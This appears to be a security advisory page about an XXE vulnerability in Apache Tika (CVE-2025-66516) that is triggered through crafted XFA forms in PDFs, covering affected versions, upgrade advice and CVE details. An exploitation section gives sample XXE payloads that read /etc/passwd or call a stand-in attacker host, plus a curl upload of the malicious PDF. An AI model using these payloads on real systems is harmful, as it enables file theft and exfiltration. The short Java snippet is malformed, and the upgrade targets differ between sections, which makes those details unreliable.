Apache Tika: XML External Entity (XXE) injection in Apache Tika (CVE-2025-66516) #shorts

Summary

Welcome to Security Spotlight. Today’s episode covers CVE-2025-66516, a critical XXE vulnerability in Apache Tika with a perfect 10.0 CVSS score. Attackers can exploit crafted XFA files inside PDFs to trigger XML External Entity injection, potentially exposing sensitive data or executing arbitrary requests.

Product details

This vulnerability affects three Apache Tika components: tika-core versions up to 3.2.1, tika-pdf-module versions up to 3.2.1, and tika-parsers 1.x releases below 2.0.0. Apache Tika is a content analysis toolkit used to extract text and metadata from diverse file formats in Java applications.

Vulnerability type summary

CVE-2025-66516 is an XML External Entity (XXE) injection flaw, classified under CWE-611. XXE occurs when an XML parser processes untrusted input containing external entity references, enabling attackers to read local files, perform server-side request forgery, or launch denial-of-service attacks.

Details of the vulnerability

Researchers discovered that crafted XFA streams embedded in PDF documents bypass tika-core’s default protections, allowing external entity resolution. Although the initial entry point was the tika-pdf-module (CVE-2025-54988), the root cause and fix reside in tika-core. Users who updated only the parser module but not tika-core remained vulnerable. Additionally, in 1.x releases, PDFParser lives in tika-parsers, expanding the affected scope.

Conclusion

To mitigate CVE-2025-66516, upgrade all Apache Tika components: tika-core and tika-pdf-module to version 3.2.2 or later, and tika-parsers to 1.28.6 or newer. Review your code for custom XML parser configurations and disable external entity processing. Stay alert for upstream patches and apply them promptly to defend against XXE exploits.

Watch the full video on YouTube: CVE-2025-66516

Remediation and exploitation details

This chain involves the following actors

  • Attacker: External adversary who crafts malicious PDF payloads
  • System Administrator: Maintains and updates Apache Tika deployments

This following systems are involved

  • Apache Tika Core (Central parsing engine for XML and other document formats): Performs XML processing and resolves entities
  • Apache Tika PDF Module (Parses PDF documents, including XFA forms): Entry point where the malicious XFA payload is handed off
  • Apache Tika Parsers (Collection of language‐specific and format‐specific parsers): In 1.x releases, hosts the PDFParser that processes XFA

Attack entry point

  • Crafted XFA payload in PDF: A PDF file embedding an XFA form that defines an external XML entity pointing to sensitive data or a remote endpoint

Remediation actions

System Administrator
Upgrade tika-core to version 3.2.2 or later
Apache Tika Core
System Administrator
Upgrade tika-pdf-module to version 3.2.2 or later
Apache Tika PDF Module
System Administrator
Upgrade tika-parsers to version 2.0.0 or later for 1.x releases
Apache Tika Parsers
Developer
Disable external entity resolution in XML parser configuration
tika-core XML parser settings

Exploitation actions

Define an external entity referencing file:///etc/passwd or http://evil.example.com/collect

Attacker
Create PDF with an XFA section containing a malicious DOCTYPE
Any authoring tool or script that can embed XFA
Examples:
  • <!DOCTYPE xfa [<!ENTITY exfil SYSTEM "file:///etc/passwd">]>

Upload or email the PDF to trigger automatic parsing

Attacker
Submit the malicious PDF to a service using Apache Tika for content extraction
Web application or service endpoint that invokes Tika
Examples:
  • curl -F "file=@malicious.pdf" https://example.com/parse

XXE injection via unresolved configuration

Apache Tika Core
Parse the PDF and pass the XFA payload to its XML parser with external entity support enabled
tika-core ≤ 3.2.1
Examples:
  • TikaInputStream tika = TikaInputStream.get(pdfStream); tika.parse(tika);

Entity resolution leads to inclusion of sensitive content

Apache Tika Core
Resolve the external entity, loading system file or fetching remote resource
tika-core XML processor
Examples:
  • Parsed output contains contents of /etc/passwd or attacker host response

Data exfiltration via returned API response or log aggregation

Attacker
Retrieve and analyze the parsed output or logs to extract sensitive data
Application logs, response payload, or storage where parsed text is saved
Examples:
  • Response body: "root:x:0:0:root:/root:/bin/bash…"

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-66516
Description
Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.
Provider
apache
CWE / problem types
CWE-611 Improper Restriction of XML External Entity Reference
Affected Software Versions
Apache Software Foundation:Apache Tika core:[{'lessThanOrEqual': '3.2.1', 'status': 'affected', 'version': '1.13', 'versionType': 'semver'}],Apache Software Foundation:Apache Tika parsers:[{'lessThan': '2.0.0', 'status': 'affected', 'version': '1.13', 'versionType': 'semver'}],Apache Software Foundation:Apache Tika PDF parser module:[{'lessThanOrEqual': '3.2.1', 'status': 'affected', 'version': '2.0.0', 'versionType': 'semver'}]
Date Published
2025-12-04T16:17:24.980Z
Last Updated
2025-12-05T18:26:45.375Z